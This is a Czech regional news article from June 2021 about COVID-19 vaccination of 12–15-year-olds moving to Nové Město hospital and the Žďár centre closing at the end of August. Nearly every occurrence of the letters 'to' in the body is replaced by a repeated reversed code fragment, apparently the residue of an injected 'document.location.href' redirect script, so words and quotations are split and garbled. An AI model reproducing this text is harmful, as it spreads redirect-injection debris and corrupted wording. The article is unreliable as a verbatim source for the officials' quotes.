Rainbow page separator

Děti budou očkovat v nemocnici, žďárské centrum od září skončí

Sobota, 26. června 2021

Žďársko / Jedním z center, kde se budou v rámci Kraje Vysočina očkovat proti onemocnění COVID-19 děti ve věku od 12 do 15 let, se stane novoměstská nemocnice.
„Pro očkování té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to specifické věkové skupiny budou nabízeny speciální časy. Kraj nyní čeká na finální verzi očkovací me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todiky, která upraví podmínky podání vakcíny dětem. S největší pravděpodobností bude pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost pediatra pouze za účelem dozoru a moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toringu průběhu očkování, nepočítá se s tím, že by pediatr přímo nutně očkoval,“ přiblížil náměstek hejtmana Kraje Vysočina pro oblast zdravotnictví Vladimír Novotný s tím, že na oficiální znění me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todiky se čeká.
Síť dvanácti velkých očkovacích center na Vysočině bude podle předpokladů ve stávajícím režimu fungovat i prázdninách. „Předpokládáme, že do začátku podzimu bude upravena logistika distribuce i u vakcíny Pfizer/BionTech, bude umožněna distribuce i do ordinací, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v menších baleních, a praktici a pediatři tak budou moci doočkovat zbytek populace, případně se opět zapojit do systému a aplikovat třetí očkovací dávky,“ uvedl hejtman Kraje Vysočina Vítězslav Schrek.
Žďárské očkovací centrum ve spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hale na Bouchalkách má podle informací kraje ukončit svoji činnost s posledním srpnem, přičemž centrum v novoměstské nemocnici zachová kapacitu ambulance bez časového omezení a očkování ze Žďáru bude od začátku září převedeno tam.